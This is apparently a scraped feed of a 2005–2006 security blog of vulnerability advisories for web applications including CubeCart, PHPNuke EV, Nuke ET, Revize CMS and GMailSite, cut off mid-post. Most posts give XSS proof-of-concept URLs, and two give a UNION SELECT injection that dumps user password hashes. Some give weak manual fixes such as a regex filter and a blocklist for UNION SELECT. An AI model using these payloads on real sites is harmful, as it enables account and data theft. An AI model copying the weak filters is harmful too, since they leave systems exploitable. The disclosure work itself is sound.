and reliability. The <br />release of Dragonfly marks yet another exciting milestone<br />in our history."<br /><br />CPG Dragonfly is vulnerable to cross site scripting that <br />allow attackers to steal information from users by adding<br />JavaScript code via some of the parameters used by the CMS<br />product. <br /> <br /><br /><br />######################<br />Versions<br />######################<br /><br />prior to Dragonfly 9.0.6.1<br /><br />#########################<br />Solution<br />########################<br /><br />No solution was available at this time.<br /><br />##########################<br />Timeline<br />##########################<br /><br />discovered:12-02-2006 <br />vendor notify:20-02-2006 (web form "contact us")<br />vendor response:---------<br />disclosure:22-02-2006<br /><br /><br />#############################<br />XSS in module 'Your_Account'<br />#############################<br /><br />http://[Victim]/index.php?name=Your_Account&error=1<br />&uname=bGFsYWxh"><script>alert(document.cookie)<br /></script><br /><br />http://[Victim]/index.php?name=Your_Account&error=1<br />"><script>alert(document.cookie)</script><br />&uname=bGFsYWxh<br /><br />http://[Victim]/index.php?name=Your_Account&profile=3<br />"><script>alert(document.cookie)</script><br /><br /><br />http://[Victim]/index.php?name=Your_Account&error=1&uname=<br />PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+<br /><br /><br />this PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+<br />is this "><script>alert(document.cookie)</script><br />base64 cross site scripting , the XSS code are encoded in base64.<br /><br />the username field are vulnerable too <br />insert in the box <script>alert()</script><br /> and this code is executed...<br /><br />#######################<br />XSS in module 'News'<br />#######################<br /><br />http://[Victim]/index.php?name=News&catid=1"><script>alert()</script><br /><br />http://[Victim]/index.php?name=News&file=article&sid=7"><script>alert()</script><br /><br />http://[Victim]/index.php?name=News&file=submit<br /> <br />// texareas 'Story Text' and Extended text are vulnerables.<br /><br />http://[Victim]/index.php?name=News&file=friend&sid=5"><script>alert()</script><br /><br /><br />#################################<br />XSS in module 'Stories_Archive'<br />#################################<br /><br />http://[Victim]/index.php?name=Stories_Archive&sa=show_month<br />&year=2005&month=11"><script>alert()</script><br /><br />http://[Victim]/index.php?name=Stories_Archive&sa=show_month<br />&year=2005"><script>alert()</script><br />>&month=11<br /><br />http://[Victim]/index.php?name=Stories_Archive&sa=show_all<br />"><script>alert()</script><br /><br />###########################<br />XSS in module 'Web_Links'<br />###########################<br /><br />http://[Victim]/index.php?name=Web_Links&l_op=viewlink<br />&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert<br />(document.cookie)</script><br /><br />http://[Victim]/index.php?name=Web_Links&l_op=viewlink<br />&cid=15"><script>alert()</script><br /><br />http://[Victim]/index.php?name=Web_Links&l_op=toprated<br />&ratenum=5&ratetype=percent"><script>alert()</script><br /><br />http://[Victim]/index.php?name=Web_Links&l_op=viewlink&cid=15<br />&orderby=titled"><script>alert()</script><br /><br /><br />###########################<br />XSS in module 'Surveys'<br />###########################<br /><br />http://[Victim]/index.php?name=Surveys&op=results<br />"><script>alert()</script>pollid=3<br /><br />http://[Victim]/index.php?name=Surveys&op=results&pollid=5<br />"><script>alert()</script><br /><br />###########################<br />XSS in module 'Downloads'<br />###########################<br /><br />http://[Victim]/index.php?name=Downloads&c=1"><script>alert()</script><br /><br />###########################<br />XSS in module 'coppermine'<br />###########################<br /><br />http://[Victim]/coppermine/thumbnails/meta="><br /><script>alert()</script><br />topn/album=1.html<br /><br />http://[Victim]/coppermine/thumbnails/metatopn/album=1.html<br />"><script>alert()</script><br /><br />http://[Victim]/index.php?name=coppermine&file=thumbnails&album=1<br />"><script>alert()</script><br /><br /><br />############################<br />XSS in module -Search-<br />############################<br /><br />http://[Victim]/index.php?name=Search<br /><br />User input passed to the search box in the following<br />modules is not sanitised before being returned to users: <br /><br />Search<br />Stories_Archive<br />Downloads<br />Topics<br /><br />if we insert in the search box this code "><script>alert()</script><br />this is executed wen we click in Search button.<br /><br />####################### €nd ############################<br /><br />Thns to estrella to be my ligth<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1138017401918316302006-01-23T03:56:00.000-08:002006-01-23T04:00:27.223-08:00MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1########################################################<br />MANUAL FIX FOR CROSS _SITE SCRIPTING Cubecart 3.0.7 pl1<br />vendor entry: http://bugs.cubecart.com/?do=details&id=459<br />advisore:http://lostmon.blogspot.com/2006/01/<br />cubecart-307-pl1-indexphp-multiple.html<br />references:<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=22471" target="_BLANK">22471</a><br />Secunia:<a href="http://secunia.com/advisories/18519/" target="_BLANK">SA18519</a><br />BID:<a href="http://www.securityfocus.com/bid/16259" target="_BLANK">16259</a><br />##########################################################<br /><br />1- includes/funcions.inc.php<br />2- index.php fix params 'act' and 'searchStr'<br />3- fix 'catId' param includes/content/viewCat.inc.php <br />4- fix 'productId' param open includes/content/viewProd.inc.php<br />5- cart.php fix params 'act' and 'searchStr'<br />6- fix param 'docId' includes/content/viewDoc.inc.php<br />7- 7- fix 'act' , 'username' ,'password','remember' and 'redir' params in includes/content/login.inc.php <br />8- fix 'productId' and $_POST includes/content/tellafriend.inc.php<br />9- Thanks<br />#############################<br />1 includes/functions.inc.php<br />#############################<br /><br />open includes/functions.inc.php look this code :<br /><br />arround line 82 ...<br />-------------------------------------------------------<br />//////////////////////////////////<br />// treat GET vars stop XSS<br />////////<br />function treatGet($text){<br /><br />$text = preg_replace("/(\<script)(.*?)(script>)/si", "", "$text");<br />$text = strip_tags($text);<br />$text = str_replace(array("'","\"",">","<","\\"), "", $text);<br />return $text;<br /><br />}<br />---------------------------------------------------------<br /><br />if you have a diferen code like this , replace for this...<br /><br />#########################################<br />2- index.php param 'act' and 'searchStr'<br />#########################################<br /><br />open index.php at line 90 you have this for 'act' param:<br /><br />------------------------------<br />if(isset($_GET['act'])){<br />switch ($_GET['act']) {<br /><br />-----------------------------------------<br /><br />you can change for this:<br /><br />-------------------------------------------<br /><br />$_GET['act'] = treatGet($_GET['act']);<br />if(isset($_GET['act'])){<br />switch ($_GET['act']) {<br />---------------------------------------------------<br /><br />open index.php at line 80 you have this for 'searchStr' param<br /><br />-----------------------------------------------------<br /><br />if(isset($_GET['searchStr'])){<br />$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));<br />-------------------------------------------------------<br /><br />you can change for this other:<br /><br />--------------------------------------------<br /><br />$_GET['searchStr'] = treatGet($_GET['searchStr']);<br />if(isset($_GET['searchStr'])){<br />$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));<br />--------------------------------------------------<br /><br />#######################################################<br />3- fix 'catId' param includes/content/viewCat.inc.php <br />#######################################################<br /><br />for fix 'catId' param open includes/content/viewCat.inc.php <br /><br />found this code at line 50:<br /><br />--------------------------------------------------<br />if(isset($_GET['catId'])) {<br /><br />----------------------------------------<br /><br />change for this other:<br />-----------------------------------------<br /><br />$_GET['catId'] = treatGet($_GET['catId']);<br />if(isset($_GET['catId'])) {<br /><br />-----------------------------------------<br /><br />###################################################<br />4 fix 'productId' param includes/content/viewProd.inc.php<br />####################################################<br /><br />at line 38 you have :<br /><br />--------------------------------------------------<br /><br />// query database<br />$query = "SELECT productId, productCode, quantity, name, description, image,<br /><br />-----------------------------------------------------------------<br /><br />you can change forr this other<br /><br />------------------------------------------------------<br />// query database<br />$_GET['productId'] = treatGet($_GET['productId']);<br />$query = "SELECT productId, productCode, quantity, name, description, image,<br /><br />---------------------------------------------------------------------<br /><br />##############################################<br />5- cart.php fix params 'act' and 'searchStr'<br />##############################################<br /><br />open cart.php for fix 'act' param look at line you have this code:<br /><br />-------------------------------------------<br />// START MAIN CONTENT<br />switch ($_GET['act']) {<br />--------------------------------------------<br /><br />replace for this other:<br /><br />---------------------------------------------<br /><br />// START MAIN CONTENT<br />$_GET['act'] = treatGet($_GET['act']);<br />switch ($_GET['act']) {<br />----------------------------------------------<br /><br />arround line 69 you have :<br />--------------------------------<br />if(isset($_GET['searchStr'])){<br />$body->assign("SEARCHSTR",$_GET['searchStr']);<br /><br />------------------------------------------<br /><br />you can change for:<br /><br />------------------------------------------<br /><br />$_GET['searchStr'] = treatGet($_GET['searchStr']);<br />if(isset($_GET['searchStr'])){<br />$body->assign("SEARCHSTR",treatGet($_GET['searchStr']));<br />---------------------------------------------<br /><br />#######################################################<br />6- fix param 'docId' includes/content/viewDoc.inc.php<br />#######################################################<br /><br />insert this line at line 36:<br />--------------------------------------<br />$_GET['docId'] = treatGet($_GET['docId']);<br />------------------------------------------<br /><br />#######################################################<br />7- fix 'act' , 'username' ,'password','remember' and <br />'redir' params in includes/content/login.inc.php <br />#######################################################<br /><br />inser this line at line 35:<br />---------------------------------------------------------<br /><br />$_GET['act'] = treatGet($_GET['act']); $_POST['username'] = treatGet($_POST['username']);<br />$_POST['password'] = treatGet($_POST['password']);<br />-----------------------------------------------------------<br /><br />for fix 'redir' param look and insert this line after line 52: <br /><br />---------------------------------------------<br />//"login","reg","unsubscribe","forgotPass"<br />$_GET['redir'] = treatGet($_GET['redir']);<br />-------------------------------------------------------------<br /><br />for fix 'remember' param inser this code at line 52:<br /><br />---------------------------------------------<br /><br />$_POST['remember'] = treatGet($_POST['remember']);<br /><br />-------------------------------------------------<br /><br /><br />######################################<br />8-fix 'productId' and $_POST <br />includes/content/tellafriend.inc.php<br />######################################<br /><br />open includes/content/tellafriend.inc.php<br /><br />add this line after line 35 for fix 'productId' param :<br /><br />------------------------------<br /><br />// query database<br />$_GET['productId'] = treatGet($_GET['productId']) ;<br /><br />-------------------------------------------------------<br /><br />fix XSS in all boxes wen post,<br />arround line 58 you have this:<br /><br />$text = sprintf($lang['front']['tellafriend']['email_body'],$_POST['recipName'],stripslashes($_POST['message']),$GLOBALS['storeURL'],$_GET['productId'],$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);<br /><br /><br /><br />you can change for this other:<br />----------------------------------------------------<br /><br />$text = sprintf($lang['front']['tellafriend']['email_body'],treatGet($_POST['recipName']),stripslashes(treatGet($_POST['message'])),$GLOBALS['storeURL'],treatGet($_GET['productId']),$GLOBALS['storeURL'],$_SERVER['REMOTE_ADDR']);<br /><br />------------------------------------------------------<br /><br />##########################<br />9- THANKS<br />##########################<br /><br />I want to thank to all those that belive in my.<br />To OSVDB (http://www.osvdb.org) by its exelente work.<br />To All Manglers and Moderators of osvdb they belive in this project and they work for it :)))<br />To Secunia (http://www.secunia.com) by his verificacion and publication and pursuit of my work ,to Securityfocus (http://www.securityfocus.com)<br />like a all those that you preocupate of which my work is distributed by different means.<br />thanks to all those that stays there and all those that no longer stays.<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1136887696400315512006-01-10T02:06:00.000-08:002006-01-23T03:58:22.420-08:00CubeCart 3.0.7-pl1 index.php multiple variable cross site scripting################################################<br />CubeCart 3.0.7-pl1 multiple variable Cross site scripting<br />Vendor url: www.cubecart.com<br />bug report:http://bugs.cubecart.com/?do=details&id=459<br />Advisore:http://lostmon.blogspot.com/2006/01/<br />cubecart-307-pl1-indexphp-multiple.html.<br />vendor notify:yes exploit avalable: yes <br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=22471" target="_BLANK">22471</a><br />Secunia:<a href="http://secunia.com/advisories/18519/" target="_BLANK">SA18519</a><br />BID:<a href="http://www.securityfocus.com/bid/16259" target="_BLANK">16259</a><br />################################################<br /><br />I recomended to all vendors to look this paper..<br />This is the new posible impact of XSS atacks:<br /><br />http://www.bindshell.net/papers/xssv.html<br /><br />CubeCart contains a flaw that allows a remote cross site scripting<br />attack.This flaw exists because the application does not validate <br />some variables upon submission to 'index.php' scripts.<br />This could allow a user to create a specially crafted URL that <br />would execute arbitrary code in a user's browser within the trust<br />relationship between the browser and the server,leading to a<br />loss of integrity.<br /><br />###############<br />VERSIONS<br />###############<br /><br />CubeCart 3.0.7-pl1 vulnerable.<br />Other versions are posible vulnerables too<br /><br />#################<br />Timeline<br />#################<br /><br />Discovered: 24 dec 2005<br />vendor notify: 10-01-2006<br />Vendor response:<br />Solution: <br />Disclosure: 10-01-2006<br />Public disclosure:16-01-2006<br /><br />###############<br />Examples:<br />###############<br /><br /><br />http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt<br />by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH<br />QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ<br />XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript<br />%3Ealert%28document.cookie%29%3C%2Fscript%3E<br /><br />http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript<br />%3Ealert%28document.cookie%29%3C%2Fscript%3E<br /><br /><br />http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript<br />%3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat<br />&Submit=Go<br /><br />http://[victim]cc3/index.php?act=login&redir=L3NpdG<br />UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb<br />2NJZD0x=%3D%22%3E%3Cscript<br />%3Ealert%28document.cookie%29%3C%2Fscript%3E<br /><br />http://victim]/cc3/index.php?act=viewProd&productId=1"><script><br />alert(document.cookie)</script><br /><br />http://victim]/cc3/index.php?act=viewDoc&docId=3"><script><br />alert(document.cookie)</script><br /><br />http://victim]/cc3/index.php?act=viewProd"><script><br />alert(document.cookie)</script><br /><br />http://victim]/cc3/index.php?act=viewCat&catId=1"><script><br />alert(document.cookie)</script><br /><br />http://victim]/cc3/index.php?act=viewCat&catId=saleItems"><script><br />alert(document.cookie)</script><br /><br />http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat<br /><br />http://victim]/cc3/index.php?act=viewDoc&docId=1"><script><br />alert(document.cookie)</script><br /><br />#################<br />User field XSS<br />#################<br />Go to http://victim]/cc3/index.php?act=login <br />and inser in the username field this: "><script><br />alert(document.cookie)</script><br /><br />#############<br />SOLUTION <br />#############<br /><br />no solution was available at this time<br /><br />currently i found a posible fix :<br /><br />see <br />http://lostmon.blogspot.com/2006/01/<br />manual-fix-for-cross-site-scripting.html<br /><br /> or <br /><br />http://bugs.cubecart.com/?do=details&id=459<br /><br /><br />##################### €nd ########################<br /><br />Thnx to estrella to be my ligth<br />Thnx to all manglers of http://www.osvdb.org<br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1136821664277095352006-01-09T07:45:00.000-08:002006-01-12T03:24:09.526-08:00PHPNuke EV 7.7 'search' module 'query' variable SQL injection###############################################<br />PHPNuke EV 7.7 'search' module 'query' variable SQL injection <br />Vendor url: http://nukevolution.com/<br />exploit available:yes vendor notify:yes<br />advisore:http://lostmon.blogspot.com/2006/01/<br />phpnuke-ev-77-search-module-query.html<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=22316" target="_BLANK">22316</a>Related OSVDB:<a href="http://osvdb.org/displayvuln.php?osvdb_id=21002" target="_BLANK">21002</a>and:<a href="http://osvdb.org/displayvuln.php?osvdb_id=20866" target="_BLANK">20866</a><br />BID:<a href="http://www.securityfocus.com/bid/16186" target="_BLANK">16186</a><br />Secunia:<a href="http://secunia.com/advisories/18394/" target="_BLANK">SA18394</a>Related Secunia:<a href="http://secunia.com/advisories/17638/" target="_BLANK">SA17638</a> and<a href="http://secunia.com/advisories/17543/" target="_BLANK">SA17543</a><br />################################################<br /><br />PHPNuke EV 7.7 have a flaw which can be exploited by malicious<br />people to conduct SQL injection attacks.<br /><br />Input passed to the "query" parameter when performing a search isn't<br />properly sanitised before being used in a SQL query. This can be<br />exploited to manipulate SQL queries by injecting arbitrary SQL code.<br /><br />#################<br />versions:<br />################<br /><br />PHPNuke EV 7.7 -R1<br /><br />posible prior versions are afected.<br /><br />##################<br />solution:<br />###################<br /><br />No solution at this time!!!<br /><br />A posible fix:<br /><br />Open file modules/Search/index.php and after this code:<br />------------------------------------<br />require_once("mainfile.php");<br />$instory = ''; <br />$module_name = basename(dirname(__FILE__));<br />get_lang($module_name);<br />----------------------------------------------<br /><br />you can add this other :<br /><br />------------------------------------<br /><br />if(eregi("UNION SELECT",$query) || eregi("UNION%20SELECT",$query)){<br />die();<br />}<br />----------------------------------------------<br />this is a "simple fix " only detect UNION SELECT comand and die<br />if this is in the query variable... you can write the same code<br />for UNION ALL SELECT or other varians of xploit<br /><br /><br />####################<br />Timeline<br />####################<br /><br />discovered:21-11-2005<br />vendor notify:29-12-2005 (forums)<br />vendor response:-------<br />vendor fix:-----<br />disclosure:09-01-2006<br /><br />###################<br />example:<br />###################<br /><br />go to<br />http://[Victim]/modules.php?name=Search<br /><br />and write in the search box this proof<br /><br />s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*<br /><br />all users hashes are available to view..<br /><br />#################### €nd ########################<br /><br />Thnx to estrella to be my ligth<br /><br /><br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1135858279576835452005-12-29T04:05:00.000-08:002005-12-30T07:45:31.466-08:00GMailSite variable Cross-Site Scripting and script injection#######################################################<br />GMailSite variable Cross-Site Scripting and script injection<br />Vendor Url:http://www.gmailsite.com/<br />vendor specific entry:http://foros.ojobuscador.com/tema1936.html<br />Advisore:http://lostmon.blogspot.com/2005/12/<br />gmailsite-variable-cross-site.html<br />vendor notify:yes Exploit available:yes <br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=22083" target="_BLANK">22083</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=22095" target="_BLANK">22095</a><br />Secunia:<a href="http://secunia.com/advisories/18155/" target="_BLANK">SA18155</a><br />BID:<a href="http://www.securityfocus.com/bid/16081" target="_BLANK">16081</a><br />########################################################<br /> <br />GMailSite is script that allows that you use your<br />account of mail of GMail to create a page in which<br />all the attached archives of your messages will be<br />published that esten kept under some label in your<br />account from mail. <br /><br />GMailSite contains a flaw that allows a remote <br />Cross-Site Scripting attack.This flaw exists because<br />the application does not validate 'lng' variable upon<br />submission to index.php script.This could allow a user <br />to create a specially crafted URL that would execute<br />arbitrary code in a user's browser within the trust <br />relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br />Wen we "inject" the html or javascript code in the 'lng'<br />variable , this code is write in the coockie and it is <br />execute every time wen we click on a link in the GMailSite<br />for stop this code only need to click in other language. <br />This Flaw Is a posible script insercion,and a posible<br />local file inclusion.<br /><br />#################<br />versions afected<br />#################<br /><br />GMailSite<br /><br />GmailSite 1.0.4 - <br />GmailSite 1.0.3 - <br />GmailSite 1.0.2 - <br />GmailSite 1.0.1 - <br />GmailSite 1.0 - <br /><br />GFHost<br /><br />GFHost 0.4.2 <br />GFHost 0.4.1 <br />GFHost 0.4 <br />GFHost 0.3 <br />GFHost 0.2 <br />GFHost 0.1.1 <br /><br />#################<br />Solution<br />#################<br /><br />No solution at this time !!!<br /><br />#############<br />Timeline<br />#############<br /><br />Discovered: 13-11-2005<br />Vendor notify: 28-12-2005<br />Vendor response:28-12-2005<br />Disclosure:29-12-2005<br /><br />##################<br />Example<br />##################<br /><br />http://[VICTIM]/?lng=es"><script>alert(document.cookie)</script><br />http://[VICTIM]/index.php?lng=es"><script>alert(document.cookie)</script><br /><br />##################### €nd ###############<br /><br />Thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1132579360239997042005-11-21T05:21:00.000-08:002005-11-24T01:14:13.473-08:00Nuke ET 'search' module 'query' variable SQL injection###############################################<br />Nuke ET 'search' module 'query' variable SQL injection <br />Vendor url: www.truzone.org<br />exploit available:yes vendor notify:yes<br />advisore:http://lostmon.blogspot.com/2005/11/<br />nuke-et-search-module-query-variable.html<br />OSVDB ID:<a href="http://osvdb.org/displayvuln.php?osvdb_id=21002" target="_BLANK">21002<br /></a>Secunia:<a href="http://secunia.com/advisories/17638/" target="_BLANK">SA17638</a><br />BID:<a href="http://securityfocus.com/bid/15519" target="_BLANK">15519</a><br />################################################<br /><br />Nuke ET have a flaw which can be exploited by malicious people to<br />conduct SQL injection attacks.<br /><br />Input passed to the "query" parameter when performing a search isn't<br />properly sanitised before being used in a SQL query. This can be<br />exploited to manipulate SQL queries by injecting arbitrary SQL code.<br /><br />#################<br />versions:<br />################<br /><br />Nuke ET 3.2<br />posible prior versions are afected.<br /><br />##################<br />solution:<br />###################<br /><br />the vendor has release a fix<br /><br /><a href="http://www.truzone.org/modules.php?name=DescNuke&d_op=getit&lid=1557" target="_BLANK">http://www.truzone.org/modules.php?name=<br />DescNuke&d_op=getit&lid=1557</a><br /> <br />aply the fix as fast posible<br /><br />####################<br />Timeline<br />####################<br /><br />discovered:21-11-2005<br />vendor notify:21-11-2005<br />vendor response:21-11-2005<br />vendor fix:21.11.2005<br />disclosure:21-11-2005<br /><br />###################<br />example:<br />###################<br /><br />go to<br />http://[Victim]/modules.php?name=Search<br /><br />and write in the search box this proof<br /><br />s%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*<br /><br />all users hashes are available to view..<br /><br />#################### €nd ########################<br /><br />Thnx to estrella to be my ligth<br />Thnx to Truzone<br />Thnx to RiXi<br />-- <br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1132144214538694992005-11-16T03:54:00.000-08:002005-11-18T05:36:03.010-08:00Revize(r) CMS SQL information disclosure and XSS#######################################################<br />Revize(r) CMS SQL information disclosure and XSS<br />Vendor url:http://www.idetix.com<br />Advisore:http://lostmon.blogspot.com/2005/11/<br />revizer-cms-sql-information-disclosure.html<br />Vendor notify: exploit available:yes<br />OSVDB ID: <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20918" target="_BLANK">20918</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20919" target="_BLANK">20919</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20920" target="_BLANK">20920</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20921" target="_BLANK">20921</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20922" target="_BLANK">20922</a><br />Securitytracker:<a href="http://securitytracker.com/id?1015231" target="BLANK">1015231</a><br />Secunia:<a href="http://secunia.com/advisories/17623/" target="_BLANK">SA17623</a><br />BID:<a href="http://securityfocus.com/bid/15481" target="_BLANK">15481</a>,<a href="http://securityfocus.com/bid/15482" target="_BLANK">15482</a>,<a href="http://securityfocus.com/bid/15484" target="_BLANK">15484</a><br />#######################################################<br /><br />The Revize(r) Web Content Management System enables<br />non-technical content contributors to quickly and easily<br />keep their Web Pages up-to-date. Revize can be applied<br />to a sophisticated, mature site or to the development of<br />a new Web Site from the ground up. And Revize is powerful<br />enough to manage Web content for any large organization.<br />Or, Revize can be localized into one or more departments.<br /><br />The Input passed to the "query" parameter in "query_results.jsp"<br />isn't properly sanitised before being used in a SQL query.<br />This can be exploited to manipulate SQL queries by injecting<br />arbitrary SQL code.<br /><br />This may allow a remote attacker execute or manipulate SQL<br />queries in the backend database.<br /><br />a remote user can obtain sensitive data , about the target <br />system if the attacker request directly ' revize.xml ' <br />located in ' conf ' directory...the normal url for this flaw is:<br />http://[victim]/revize/conf/<br /><br />#################<br />version<br />#################<br /><br />unknow version of Revize(r) CMS<br /><br />##################<br />solution<br />##################<br /><br />No solution at this time.<br /><br />###################<br />Timeline<br />###################<br /><br />Discovered: 02-11-2005<br />vendor notify:14-11-2005<br />vendor response:<br />disclosure:16-11-2005<br /><br />#######################<br />examples<br />#######################<br /><br />SQL command:<br /><br />http://[Victim]/revize/debug/query_results.jsp?<br />webspace=REVIZE&query=select%20*%20from%20pbpublic.rSubjects<br /><br />http://[Victim]/revize/debug/query_results.jsp?query=<br />select%20*%20from%20pbpublic.rSubjects<br /><br />http://[Victim]/revize/debug/query_input.jsp?<br />table=rSubjects&apptable&webspace=REVIZE<br /><br />¿Admin Bypass ?<br /><br />http://[Victim]/revize/debug/<br /><br />wen we are in this url , the page have a login form for<br />accessing, but if we click in any link we can obtain some<br />relevant information about the site and we don´t need a login.<br /><br /><br />http://[Victim]/revize/debug/apptables.html<br />http://[Victim]/revize/debug/main.html<br /><br />#####################<br />cross site scripting<br />#####################<br /><br />http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/<br />admincenter/setWebSpace.jsp&action=login&resourcetype=%22%3E%3<br />Cscript%3Ealert(document.cookie)%3C/script%3Esecurity&objectmap<br />=subject&error=admincenter/login.jsp<br /><br />http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/<br />admincenter/setWebSpace.jsp&action=login&resourcetype=security<br />&objectmap=subject%22%3E%3Cscript%3Ealert(document.cookie)%3C/<br />script%3E&error=admincenter/login.jsp<br /><br />http://[victim]/revize/HTTPTranslatorServlet?redirect=/revize/<br />admincenter/setWebSpace.jsp%22%3E%3Cscript%3Ealert(document.<br />cookie)%3C/script%3E&action=login&resourcetype=security&objectmap<br />=subject&error=admincenter/login.jsp<br /><br /><br />################### €nd ############################<br /><br />thnx to estrella to be my ligth<br /><br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-1131098560842164192005-11-04T01:55:00.000-08:002005-11-18T05:26:36.790-08:00Spymac Web OS v4 blogs and notes multiple variable XSS#####################################################<br />Spymac Web OS v4 blogs and notes multiple variable XSS<br />Vendor url: http://www.spymac.com &<br />http://arnieshwartz.spymac.com/the_spymac_web_os.htm<br />Advisore: http://lostmon.blogspot.com/2005/11/<br />spymac-web-os-v4-blogs-and-notes.html<br />Vendor notify :yes exploit available: yes<br />OSVDB ID:<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20902" target="_BLANK">20902</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20903" target="_BLANK">20903</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20904" target="_BLANK">20904</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20905" target="_BLANK">20905</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20906" target="_BLANK">20906</a>,<a href="http://www.osvdb.org/displayvuln.php?osvdb_id=20907" target="_BLANK">20907</a><br /><br />#####################################################<br /><br /><br />Spymac is powered by an integrated collection of applications<br />(developed in-house)that together form "Spymac WOS". Spymac<br />WOS is an intelligent environment featuring patent-pending <br />technology that allows for the creation of an immersive and<br />visually-stunning Web experience.<br /><br />Spymac have a flaw that allows a remote cross site scripting attack.<br />This flaw exists because the application does not validate <br />multiple variables upon submission to multiple scripts.<br />This could allow a user to create a specially crafted URL<br />that would execute arbitrary code in a user's browser within<br />the trust relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br />################<br />VERSIONS<br />################<br /><br />Spymac Web Os 4.0<br /><br />#########<br />Solution<br />#########<br /><br />No solution at this time <br /><br />##########<br />timeline<br />##########<br /><br />Discovered : 28 10 2005<br />Vendor notify: 02 11 2005<br />Vendor response: <br />Disclosure : 04-11-2005<br /><br /><br />###################<br />EXAMPLES#<br />###################<br /><br />For exploit some vulns, you need to login.<br /><br />###########<br />IN BLOGS<br />###########<br 